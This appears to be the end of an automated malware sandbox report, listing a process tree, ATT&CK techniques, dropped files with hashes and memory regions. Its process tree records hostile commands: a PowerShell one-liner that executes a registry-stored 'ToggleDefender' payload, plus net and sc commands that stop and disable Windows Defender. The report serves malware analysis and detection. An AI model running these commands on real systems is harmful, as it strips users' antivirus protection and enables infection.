                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6980 /prefetch:1
                                                    5⤵
                                                      PID:4240
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7764 /prefetch:8
                                                      5⤵
                                                        PID:616
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                                                        5⤵
                                                        • Drops file in Program Files directory
                                                        PID:3108
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff7ea355460,0x7ff7ea355470,0x7ff7ea355480
                                                          6⤵
                                                            PID:5128
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7764 /prefetch:8
                                                          5⤵
                                                            PID:5352
                                                  • C:\Windows\servicing\TrustedInstaller.exe
                                                    C:\Windows\servicing\TrustedInstaller.exe
                                                    1⤵
                                                      PID:1876
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
                                                        2⤵
                                                        • Modifies Windows Defender Real-time Protection settings
                                                        • Modifies data under HKEY_USERS
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1544
                                                        • C:\Windows\SysWOW64\sc.exe
                                                          "C:\Windows\system32\sc.exe" qc windefend
                                                          3⤵
                                                          • Launches sc.exe
                                                          PID:4040
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                                                          3⤵
                                                            PID:5004
                                                          • C:\Windows\SysWOW64\whoami.exe
                                                            "C:\Windows\system32\whoami.exe" /groups
                                                            3⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2488
                                                          • C:\Windows\SysWOW64\net1.exe
                                                            "C:\Windows\system32\net1.exe" stop windefend
                                                            3⤵
                                                              PID:720
                                                            • C:\Windows\SysWOW64\sc.exe
                                                              "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
                                                              3⤵
                                                              • Launches sc.exe
                                                              PID:1976
                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                          1⤵
                                                            PID:1936
                                                          • C:\Windows\system32\WerFault.exe
                                                            C:\Windows\system32\WerFault.exe -pss -s 408 -p 4976 -ip 4976
                                                            1⤵
                                                              PID:6008

                                                            Network

                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                            Execution

                                                            Scheduled Task

                                                            1
                                                            T1053

                                                            Persistence

                                                            Modify Existing Service

                                                            1
                                                            T1031

                                                            Hidden Files and Directories

                                                            2
                                                            T1158

                                                            Registry Run Keys / Startup Folder

                                                            1
                                                            T1060

                                                            Scheduled Task

                                                            1
                                                            T1053

                                                            Privilege Escalation

                                                            Scheduled Task

                                                            1
                                                            T1053

                                                            Defense Evasion

                                                            Modify Registry

                                                            3
                                                            T1112

                                                            Disabling Security Tools

                                                            1
                                                            T1089

                                                            Hidden Files and Directories

                                                            2
                                                            T1158

                                                            Install Root Certificate

                                                            1
                                                            T1130

                                                            Credential Access

                                                            Credentials in Files

                                                            2
                                                            T1081

                                                            Discovery

                                                            Query Registry

                                                            3
                                                            T1012

                                                            System Information Discovery

                                                            3
                                                            T1082

                                                            Collection

                                                            Data from Local System

                                                            2
                                                            T1005

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads

                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                              Filesize

                                                              2KB

                                                              MD5

                                                              2f57fde6b33e89a63cf0dfdd6e60a351

                                                              SHA1

                                                              445bf1b07223a04f8a159581a3d37d630273010f

                                                              SHA256

                                                              3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                                              SHA512

                                                              42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                                              Filesize

                                                              1KB

                                                              MD5

                                                              4280e36a29fa31c01e4d8b2ba726a0d8

                                                              SHA1

                                                              c485c2c9ce0a99747b18d899b71dfa9a64dabe32

                                                              SHA256

                                                              e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

                                                              SHA512

                                                              494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tmp.exe.log
                                                              Filesize

                                                              1KB

                                                              MD5

                                                              69d71014fdb9e6dcd1758f2c46e07d17

                                                              SHA1

                                                              5d2622a9855dc131cfe3683e791888dd8aa8cbc9

                                                              SHA256

                                                              1a8d4efe9e6901bb174a9c665004ac353c2fef126fdd3e08ddffacfe262fa6b4

                                                              SHA512

                                                              217ef49ac56d9b5c26ebd05731e18f8b9e920a1bfe8f278e2fb1cfce0c0a476a99cae69f0859c1f19926dcb9c23600c71a93f6fa69d2f0bba6bcd21dfc385df2

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                              Filesize

                                                              53KB

                                                              MD5

                                                              06ad34f9739c5159b4d92d702545bd49

                                                              SHA1

                                                              9152a0d4f153f3f40f7e606be75f81b582ee0c17

                                                              SHA256

                                                              474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

                                                              SHA512

                                                              c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                              Filesize

                                                              53KB

                                                              MD5

                                                              0bf8f2ab89fdd0122cb4feab8c6d834f

                                                              SHA1

                                                              d6d064bceb0c0b974395c64a0beb4559937ce27b

                                                              SHA256

                                                              63d67c5d596e43949664f137222572cea92080ded57140498588138decc3895c

                                                              SHA512

                                                              992bb7b3643fb8fab36dda775fba2945953e8bdd1aefbc769ed007ae09bbaa676c0da0dce3d1d7890b3ccdcba92b9efe7348394c1b5fbc7da30cb3eabbdf1d23

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                              Filesize

                                                              16KB

                                                              MD5

                                                              e96938f3913f0ca9766209399c849de9

                                                              SHA1

                                                              345cc68f93f39be290c6af45283d1e228fc42b3c

                                                              SHA256

                                                              2e4aa04e6bae5b8f0773e78103126acf37848c00c88c064f3c31f41bafaf2929

                                                              SHA512

                                                              73e9efbbffe1adab0505c7825f3541a18ece29b6706db50cd0f75080bea34bdf117091256ca68582b6eecca134c3ff227a359c2718a0ca19293b3543dd077530

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                              Filesize

                                                              13KB

                                                              MD5

                                                              8ef804847ea7416d17ad401dde2ae781

                                                              SHA1

                                                              1bed38b867e5c405bbd6481711a02360bb5934d7

                                                              SHA256

                                                              b004e341cb506a2e519a837f065a1ca60f542bc7f6c01ded8cce75ab545ae17b

                                                              SHA512

                                                              f4e2d8d7d5e8b461c51d68096984abf84603f5d92f83e627531ae1816ab540c84733b85b6d7cb9012d04a9af8ca745b421cc9ab516aa0f45c002b8a6dd20727c

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                              Filesize

                                                              20KB

                                                              MD5

                                                              0ee816a285be9e95aa811ef8c8c64ad6

                                                              SHA1

                                                              be7f1e91a84c4de7ca41bc170ac9a0f897296765

                                                              SHA256

                                                              a5d51177b9c3c9a273650398f9ec1aabe40e9d1e81763d1895894d85e0751963

                                                              SHA512

                                                              97961ed7a03ddfc456d5561963de9dc2ccf1e3c89b8e5a0b490ed748789e329b31923368dbe892f239aff9bc4e28dac4a2b7543dfea4efaf5364b7f15055f989

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                              Filesize

                                                              20KB

                                                              MD5

                                                              0ee816a285be9e95aa811ef8c8c64ad6

                                                              SHA1

                                                              be7f1e91a84c4de7ca41bc170ac9a0f897296765

                                                              SHA256

                                                              a5d51177b9c3c9a273650398f9ec1aabe40e9d1e81763d1895894d85e0751963

                                                              SHA512

                                                              97961ed7a03ddfc456d5561963de9dc2ccf1e3c89b8e5a0b490ed748789e329b31923368dbe892f239aff9bc4e28dac4a2b7543dfea4efaf5364b7f15055f989

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                              Filesize

                                                              1KB

                                                              MD5

                                                              477031a32089e6d066092d640b526add

                                                              SHA1

                                                              5041602c7c71b4c6e40928039dcc07b6b32a67f2

                                                              SHA256

                                                              0ec3dcb238a28e1b43e2f7b03f955f6304927314c40a51f1d4b2b00345c12bef

                                                              SHA512

                                                              01388ea1af8248901beb17d1fa62efead2ae1bf9accfc8e132f4f0c0e77c068fd7e998d218043fdc90c497824ca3723689502490da4fd97237a4f0d40ef2bb4e

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                              Filesize

                                                              20KB

                                                              MD5

                                                              2d12f3d8b096a0fcf88f79dd2c5a93c1

                                                              SHA1

                                                              5cf3c9f08d9398c8d60e6bc4286d3c1bfcb90540

                                                              SHA256

                                                              7473d9985ad5eee33541f666d2c3b721532c2686ea7cf704ab53eae47d1fa1f1

                                                              SHA512

                                                              0326fe2483251418824737387c69d76f3951ee85ca986f28dc15319ddd4b0e0a33cfc874b790c907701ef3712b26fdcc79617089056f5c657b0e1be8e9ff4449

                                                            • C:\Users\Admin\AppData\Local\Temp\899D.tmp\899E.tmp\899F.bat
                                                              Filesize

                                                              359B

                                                              MD5

                                                              c8a31c0b7599a9a2bd7c4500f27ac39e

                                                              SHA1

                                                              ed3ef80304778e80c1fad8247ed13a075083ef95

                                                              SHA256

                                                              8f0202e6ceb1e467066aa618ec0f69d859dbb7b3494789472fa5677ba7e926f1

                                                              SHA512

                                                              5dcabd9404669760488f3e58e85f1c7ca94848001c35175c789f4a2d780e2408db1a9051028072e47a6aaa59aa3e01a0a2388dbc7bf48ddc6c3d8b913cac1dbe

                                                            • C:\Users\Admin\AppData\Local\Temp\Updeter.exe
                                                              Filesize

                                                              120KB

                                                              MD5

                                                              b677cebc577f2285a16340a73f3e4d39

                                                              SHA1

                                                              40633e22558a6c728f228515f3097359dbc0458d

                                                              SHA256

                                                              6d746c5c7f76ca351c64535c2c65fa61593174d726586b339924f25546ac9544

                                                              SHA512

                                                              a1d2eb1132feb999f463f269f824167618f41d6e5cd567952f4267fbd2f99cdb22884f2d6bad74279a0e70a96b6fd3d9092c49de2af2acc5212892b450576b68

                                                            • C:\Users\Admin\AppData\Local\Temp\Updeter.exe
                                                              Filesize

                                                              120KB

                                                              MD5

                                                              b677cebc577f2285a16340a73f3e4d39

                                                              SHA1

                                                              40633e22558a6c728f228515f3097359dbc0458d

                                                              SHA256

                                                              6d746c5c7f76ca351c64535c2c65fa61593174d726586b339924f25546ac9544

                                                              SHA512

                                                              a1d2eb1132feb999f463f269f824167618f41d6e5cd567952f4267fbd2f99cdb22884f2d6bad74279a0e70a96b6fd3d9092c49de2af2acc5212892b450576b68

                                                            • C:\Users\Admin\AppData\Local\Temp\Ynraflilhuhdhncsolreloader.exe
                                                              Filesize

                                                              9.7MB

                                                              MD5

                                                              0974f41ccfe913ecca0e02b69e2a48e2

                                                              SHA1

                                                              b96e82a039a2024a8c352b6332a582593628bfba

                                                              SHA256

                                                              7186284537f1f025d1f2e92d6f7b40b0a2de4ecc8a9c5ee96ff90001c38e6a8b

                                                              SHA512

                                                              60bcd8102e535b0d56ef170609ec6f3c5fcf36ab09e4fcfbf82fe92e77124bc6ee19dae7963b1078424d65010b43a741615ba0dbdce582d6402f8adf97303c8e

                                                            • C:\Users\Admin\AppData\Local\Temp\Ynraflilhuhdhncsolreloader.exe
                                                              Filesize

                                                              9.7MB

                                                              MD5

                                                              0974f41ccfe913ecca0e02b69e2a48e2

                                                              SHA1

                                                              b96e82a039a2024a8c352b6332a582593628bfba

                                                              SHA256

                                                              7186284537f1f025d1f2e92d6f7b40b0a2de4ecc8a9c5ee96ff90001c38e6a8b

                                                              SHA512

                                                              60bcd8102e535b0d56ef170609ec6f3c5fcf36ab09e4fcfbf82fe92e77124bc6ee19dae7963b1078424d65010b43a741615ba0dbdce582d6402f8adf97303c8e

                                                            • C:\Users\Admin\AppData\Local\Temp\updeter.vbs
                                                              Filesize

                                                              112KB

                                                              MD5

                                                              8b50289dfca4b0f572536e3ff6b51b96

                                                              SHA1

                                                              8fac95861b2803dcae74709b08361c4e89e8ae86

                                                              SHA256

                                                              0b0c649fca400195a96031b16acc9b002d9556520c7e61f689967fd46eb058c8

                                                              SHA512

                                                              da5f11ebad71aaa8389f3c250ec06a54ff29b869bb738d6c61eaa7032b359bcfebfdbaa807b886aa02f8d15745f02b1162ef7774457a4911b7b9eb1a20f81acc

                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\BC9827C99B5A763808B10810DD038DE2DB88A3BB
                                                              Filesize

                                                              984B

                                                              MD5

                                                              e53283d76f4a3b7db77ca5dca00c61a7

                                                              SHA1

                                                              bc25408281c02959260239002a93f8635cce8c48

                                                              SHA256

                                                              0eb8d99de26e9f8f198c4494d71bef045a038bdcb39030cbeb461ff0b82cbf35

                                                              SHA512

                                                              edc6b470c2f603cd8ad5bf29dafbb72f3d707e83633ff0b6af28cb479534d61dcd71782a8e43f100225498949c2e174732b3f0cc2edad708cec11d0bca1739ef

                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\BC9827C99B5A763808B10810DD038DE2DB88A3BB
                                                              Filesize

                                                              1012B

                                                              MD5

                                                              61712957556757a2813b0075c3c96e9e

                                                              SHA1

                                                              ebe216ab7273cde5e91e1937cfd37c4a402e432e

                                                              SHA256

                                                              20925c8189fdf5e4ebd770b01d30151934f71eaba5b14cdde1c35dd0950b25f0

                                                              SHA512

                                                              68f762aba0da7af5e1b31cb9e136ace2ec9805b37e03ad0779d9f663d87fa1554ec46269b18bd19f058902e6d233a3eb9dda98dc492426e6121d6c777f39c28d

                                                            • C:\Users\Admin\AppData\Roaming\Updeter.exe
                                                              Filesize

                                                              6KB

                                                              MD5

                                                              d450f4523f607f01a50b039c83a60422

                                                              SHA1

                                                              7532dc7f0a86fd1a57d8b766d5673297c649fc68

                                                              SHA256

                                                              0f4929da9001eab23942eab268ece5da252c8b654273cc6ddaad9f87dcfbb1fa

                                                              SHA512

                                                              45a88e4adf74d0736004052b30fa8b0445703c7772f8963442179d392f2823e95997d4f5e2237ffa2f655aff784199f33e29ee4156fe199a6dbd3050f6524bf6

                                                            • C:\Users\Admin\AppData\Roaming\rr.ps1
                                                              Filesize

                                                              3.1MB

                                                              MD5

                                                              85ba5955d189df04134dafef32564b86

                                                              SHA1

                                                              9f063d1b3539855140db17c41f633ccc3c125d10

                                                              SHA256

                                                              67663d1259adba451b85bddbf5516b51ffc4229e0052e3a83d4e16f06e0feb94

                                                              SHA512

                                                              6f425f77076d3bbeab945ce3dac446b3da303336754d6c0fbe8dce80dc6d7b61b855ad179f5d6736323193c3108528f4aa042320b38032376bc80ddfbd40459d

                                                            • \??\pipe\LOCAL\crashpad_4992_QUKFHXDLFNXUYCKJ
                                                              MD5

                                                              d41d8cd98f00b204e9800998ecf8427e

                                                              SHA1

                                                              da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                              SHA256

                                                              e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                              SHA512

                                                              cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                            • memory/228-365-0x0000000000000000-mapping.dmp
                                                            • memory/336-353-0x0000000000000000-mapping.dmp
                                                            • memory/720-384-0x0000000000000000-mapping.dmp
                                                            • memory/820-262-0x0000000000000000-mapping.dmp
                                                            • memory/928-310-0x0000000000000000-mapping.dmp
                                                            • memory/1068-273-0x0000000000000000-mapping.dmp
                                                            • memory/1156-170-0x0000000000000000-mapping.dmp
                                                            • memory/1216-259-0x0000000000000000-mapping.dmp
                                                            • memory/1276-233-0x0000000000000000-mapping.dmp
                                                            • memory/1388-171-0x0000000000000000-mapping.dmp
                                                            • memory/1412-282-0x0000000000000000-mapping.dmp
                                                            • memory/1544-330-0x0000000000000000-mapping.dmp
                                                            • memory/1660-169-0x0000000000000000-mapping.dmp
                                                            • memory/1768-369-0x0000000000000000-mapping.dmp
                                                            • memory/1868-268-0x0000000000000000-mapping.dmp
                                                            • memory/1976-385-0x0000000000000000-mapping.dmp
                                                            • memory/2100-296-0x0000000000000000-mapping.dmp
                                                            • memory/2280-360-0x0000000000000000-mapping.dmp
                                                            • memory/2280-373-0x00007FF82C1C0000-0x00007FF82CC81000-memory.dmp
                                                              Filesize

                                                              10.8MB

                                                            • memory/2280-366-0x00007FF82C1C0000-0x00007FF82CC81000-memory.dmp
                                                              Filesize

                                                              10.8MB

                                                            • memory/2488-372-0x0000000000000000-mapping.dmp
                                                            • memory/2944-283-0x0000000000000000-mapping.dmp
                                                            • memory/2976-188-0x0000000000000000-mapping.dmp
                                                            • memory/3108-396-0x0000000000000000-mapping.dmp
                                                            • memory/3232-327-0x0000000000000000-mapping.dmp
                                                            • memory/3288-275-0x0000000000000000-mapping.dmp
                                                            • memory/3584-376-0x0000000000000000-mapping.dmp
                                                            • memory/3696-251-0x0000000007040000-0x0000000007062000-memory.dmp
                                                              Filesize

                                                              136KB

                                                            • memory/3696-250-0x0000000007190000-0x0000000007226000-memory.dmp
                                                              Filesize

                                                              600KB

                                                            • memory/3696-234-0x0000000000000000-mapping.dmp
                                                            • memory/3700-307-0x0000000000000000-mapping.dmp
                                                            • memory/3732-342-0x000001EC1FB90000-0x000001EC1FBB2000-memory.dmp
                                                              Filesize

                                                              136KB

                                                            • memory/3732-355-0x00007FF82C080000-0x00007FF82CB41000-memory.dmp
                                                              Filesize

                                                              10.8MB

                                                            • memory/3732-344-0x00007FF82C080000-0x00007FF82CB41000-memory.dmp
                                                              Filesize

                                                              10.8MB

                                                            • memory/3732-337-0x0000000000000000-mapping.dmp
                                                            • memory/3744-186-0x0000000000000000-mapping.dmp
                                                            • memory/3984-305-0x0000000000000000-mapping.dmp
                                                            • memory/4020-166-0x0000000000000000-mapping.dmp
                                                            • memory/4028-334-0x0000000000000000-mapping.dmp
                                                            • memory/4040-362-0x0000000000000000-mapping.dmp
                                                            • memory/4196-303-0x0000000000000000-mapping.dmp
                                                            • memory/4240-378-0x0000000000000000-mapping.dmp
                                                            • memory/4308-140-0x00000000060E0000-0x0000000006146000-memory.dmp
                                                              Filesize

                                                              408KB

                                                            • memory/4308-141-0x0000000006850000-0x000000000686E000-memory.dmp
                                                              Filesize

                                                              120KB

                                                            • memory/4308-136-0x0000000000000000-mapping.dmp
                                                            • memory/4308-137-0x0000000003280000-0x00000000032B6000-memory.dmp
                                                              Filesize

                                                              216KB

                                                            • memory/4308-138-0x0000000005950000-0x0000000005F78000-memory.dmp
                                                              Filesize

                                                              6.2MB

                                                            • memory/4308-139-0x0000000006070000-0x00000000060D6000-memory.dmp
                                                              Filesize

                                                              408KB

                                                            • memory/4308-143-0x0000000006D50000-0x0000000006D6A000-memory.dmp
                                                              Filesize

                                                              104KB

                                                            • memory/4308-142-0x0000000007EF0000-0x000000000856A000-memory.dmp
                                                              Filesize

                                                              6.5MB

                                                            • memory/4316-301-0x0000000000000000-mapping.dmp
                                                            • memory/4404-203-0x00000000078B0000-0x000000000794C000-memory.dmp
                                                              Filesize

                                                              624KB

                                                            • memory/4404-189-0x0000000000000000-mapping.dmp
                                                            • memory/4428-204-0x0000000000000000-mapping.dmp
                                                            • memory/4428-209-0x0000000000560000-0x0000000000576000-memory.dmp
                                                              Filesize

                                                              88KB

                                                            • memory/4496-294-0x0000000000000000-mapping.dmp
                                                            • memory/4540-374-0x0000000000000000-mapping.dmp
                                                            • memory/4712-158-0x0000000005E60000-0x0000000006022000-memory.dmp
                                                              Filesize

                                                              1.8MB

                                                            • memory/4712-151-0x0000000004880000-0x0000000004892000-memory.dmp
                                                              Filesize

                                                              72KB

                                                            • memory/4712-147-0x0000000000000000-mapping.dmp
                                                            • memory/4712-160-0x00000000062A0000-0x0000000006316000-memory.dmp
                                                              Filesize

                                                              472KB

                                                            • memory/4712-161-0x0000000006420000-0x000000000643E000-memory.dmp
                                                              Filesize

                                                              120KB

                                                            • memory/4712-148-0x0000000000400000-0x000000000041E000-memory.dmp
                                                              Filesize

                                                              120KB

                                                            • memory/4712-153-0x0000000004B80000-0x0000000004C8A000-memory.dmp
                                                              Filesize

                                                              1.0MB

                                                            • memory/4712-152-0x00000000048E0000-0x000000000491C000-memory.dmp
                                                              Filesize

                                                              240KB

                                                            • memory/4712-159-0x0000000006560000-0x0000000006A8C000-memory.dmp
                                                              Filesize

                                                              5.2MB

                                                            • memory/4712-150-0x0000000004EA0000-0x00000000054B8000-memory.dmp
                                                              Filesize

                                                              6.1MB

                                                            • memory/4820-258-0x0000000000000000-mapping.dmp
                                                            • memory/4828-323-0x0000000000000000-mapping.dmp
                                                            • memory/4948-135-0x00000000072D0000-0x00000000072F2000-memory.dmp
                                                              Filesize

                                                              136KB

                                                            • memory/4948-134-0x00000000090C0000-0x0000000009152000-memory.dmp
                                                              Filesize

                                                              584KB

                                                            • memory/4948-132-0x0000000000F30000-0x0000000000F38000-memory.dmp
                                                              Filesize

                                                              32KB

                                                            • memory/4948-133-0x0000000009570000-0x0000000009B14000-memory.dmp
                                                              Filesize

                                                              5.6MB

                                                            • memory/4976-246-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-216-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-260-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-276-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-277-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-261-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-266-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-284-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-288-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-291-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-256-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-144-0x0000000000000000-mapping.dmp
                                                            • memory/4976-252-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-249-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-302-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-245-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-241-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-240-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-239-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-313-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-314-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-318-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-235-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-154-0x0000000140000000-0x00000001412A5000-memory.dmp
                                                              Filesize

                                                              18.6MB

                                                            • memory/4976-324-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-326-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-229-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-228-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-225-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-224-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-220-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-219-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-335-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-269-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-215-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-212-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-211-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-343-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-210-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-348-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-205-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-354-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-200-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-359-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-196-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-195-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

